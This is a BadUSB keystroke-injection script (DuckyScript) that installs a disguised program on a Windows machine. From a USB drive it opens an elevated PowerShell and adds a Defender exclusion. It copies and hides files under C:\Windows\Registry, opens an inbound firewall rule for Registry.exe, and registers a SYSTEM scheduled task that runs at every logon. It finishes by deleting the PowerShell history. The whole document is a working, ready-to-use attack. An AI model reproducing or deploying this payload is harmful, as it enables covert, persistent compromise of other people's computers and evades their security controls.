DELAY 1000
REM Open Run prompt
GUI r
DELAY 1000
REM Start elevated PowerShell
STRING PowerShell Start-Process -Verb runAs PowerShell
ENTER
DELAY 5000
ALT y
ALT t
DELAY 5000
REM Shrink PowerShell window
STRING mode con cols=20 lines=1
ENTER
REM Preparing hidden PowerShell window for payload
STRING Start-Process -WindowStyle Hidden PowerShell "
REM Payload
STRING Add-MpPreference -ExclusionPath C:\Windows\Registry;
STRING (Get-Volume -FileSystemLabel Ventoy).DriveLetter + ':\'|cd;
STRING cp Registry.zip C:\Windows\Registry.zip;
STRING cd C:\Windows;
STRING Mkdir Registry;
STRING Expand-Archive -Path Registry.zip -force;
STRING Remove-Item Registry.zip;
STRING cd Registry;
STRING attrib +s +h /s /d;
STRING attrib +s +h .;
STRING New-NetFirewallRule -DisplayName 'Registry' -Direction Inbound -Program 'C:\Windows\Registry\Registry.exe' -Action Allow;
STRING Register-ScheduledTask Registry 
STRING -Action (New-ScheduledTaskAction -Execute 'C:\Windows\Registry\Registry.vbs' -WorkingDirectory 'C:\Windows\Registry') 
STRING -Trigger (New-ScheduledTaskTrigger -AtLogon) 
STRING -Principal (New-ScheduledTaskPrincipal -UserID 'NT AUTHORITY\SYSTEM' -LogonType ServiceAccount -RunLevel Highest) -f;
STRING .\Registry.vbs
REM End of payload
REM Clear PowerShell history and exit
STRING ";(Get-PSReadlineOption).HistorySavePath | rm;exit
ENTER
